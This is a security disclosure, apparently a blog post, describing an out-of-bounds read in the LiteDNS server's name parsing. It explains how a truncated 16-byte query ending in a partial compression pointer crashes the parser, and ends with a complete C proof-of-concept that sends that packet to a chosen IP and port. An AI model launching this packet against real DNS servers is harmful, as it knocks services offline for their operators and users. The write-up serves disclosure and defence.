LiteDNS: Out-of-Bounds Read in DNS Name Parsing Leads to Denial of Service (DoS)

Written by : Antonius (w1sdom)
Web : www.bluedragonsec.com
Github : https://github.com/bluedragonsecurity
Vulnerability discovered by : Antonius
Date of Discovery : March 6 2026

LiteDNS is a lightweight, C-based DNS server that supports basic DNS query resolution for A, AAAA, CNAME, NS, MX, and TXT records. This dns server runs on Linux platform.

The project url is at https://github.com/TanishqNanavati/LiteDNS

There is a remotely exploited vulnerability in this dns server that can causes a denial of service.

Vulnerability has been tested on this environment :

Tested Environment

• Operating System: CentOS Stream 9
• Architecture: x86_64
• Kernel: Linux 5.14.0-635.el9.x86_64
• Working Directory During Testing: /var/root/LiteDNS
• Build Configuration: AddressSanitizer-enabled build

Here is the asan log :

Press enter or click to view image in full size

Vulnerability discovered during fuzzing. Here is the last dns packet that causes crash :

Press enter or click to view image in full size

Packet in hex :

12 34 01 00 00 01 00 00 00 00 00 00 02 41 42 FF

This packet is 16 bytes total. It is structured as:

• 12-byte DNS header
• 4-byte beginning of the Question section

So the layout is:

[ DNS Header: 12 bytes ]              [ Question section begins: 4 bytes ]
12 34 01 00 00 01 00 00 00 00 00 00            02 41 42 FF

A valid DNS question must contain:

1. a complete QNAME
2. a QTYPE field (2 bytes)
3. a QCLASS field (2 bytes)

This packet does not contain a complete question, it’s a truncated dns query. It has only:

• a header
• the start of a QNAME
• then an incomplete trailing byte that looks like the beginning of a compression pointer

The Compression Pointer

After the label "AB" (the byte sequence : 0x41 and 0x42), a valid DNS name encoding must continue with an End of Name (0x00) or a Compression Pointer.

When the top 2 bits sets to 1 it means a compression pointer. The binary of 0xff is 11111111, so it meets the criteria of a compression pointer since the top 2 bits sets to 1 : 11xxxxxx

Why this Compression Pointer Triggers a Denial of Service on LiteDNS ?

Because if FF is treated as a compression pointer start, the parser expects:

• current byte = first pointer byte
• next byte = second pointer byte

But the packet ends immediately after 0xFF. What happens to parser in the background ?

Step 1

It starts reading the question name at offset 12 (0x02)

12 34 01 00 00 01 00 00 00 00 00 00 02 41 42 FF

so the parser determines the label length is 2.

Step 2

The parser reads the next 2 bytes sequences : 41 and 42, so the label is “AB”

Step 3

Now the offset reaches FF, since FF is a compression pointer, the parser treats it as a pointer byte.

Step 4

The parser then tries to read the next byte in order to complete the pointer, unfortunetly there is no next byte inside the dns packet hence it causes the parser to read past the received packet boundary.

Step 6

After that, the derived offset may become attacker-influenced garbage, and the parser may continue reading from an invalid location, eventually causing a crash.

Proof of Concept

/*
# Exploit Title: LiteDNS remote denial of service
# Vendor Homepage: https://github.com/TanishqNanavati 
# Software Link: https://github.com/TanishqNanavati/LiteDNS
# Version: LiteDNS before a fix for this issue. If exact tagged versions are unavailable, use: current upstream source / latest tested revision at the time of discovery
# Tested on: CentOS Stream 9
# Google Dork: N/A
# Date: 2026-03-06
# Exploit Author: Antonius 
# Web : www.bluedragonsec.com 
# Github : https://github.com/bluedragonsecurity
# Description:
This is proof of concept exploit for rempote out-of-bound reads at LiteDNS.
LiteDNS is a lightweight, C-based DNS server that supports basic DNS query resolution for A, AAAA, CNAME, NS, MX, and TXT records.
Vulnerability discovered by : Antonius 
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    int sock;
    struct sockaddr_in server;
    unsigned char packet[] = {0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x41, 0x42, 0xff}; 

    if (argc < 3) {
        printf("[*] usage : ./exploit <target ip> <port number>");
        exit(-1);
    }
    char *ip = argv[1];
    int port = atoi(argv[2]);
    sock = socket(AF_INET, SOCK_DGRAM, 0);
    if (sock < 0) {
        perror("[-] failed to create socket");
        exit(-1);
    }

    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    inet_pton(AF_INET, ip, &server.sin_addr);
    ssize_t sent = sendto(sock, packet, 16, 0, (const struct sockaddr *)&server, sizeof(server));
    
    if (sent < 0) {
        perror("[-] Sendto failed");
    } else {
        printf("[+] Successfully sent %zd bytes to %s:%d\n", sent, ip, port);
    }

    close(sock);

    return 0;
}

References

https://github.com/bluedragonsecurity/LiteDNS_out_of_bounds_read_vulnerability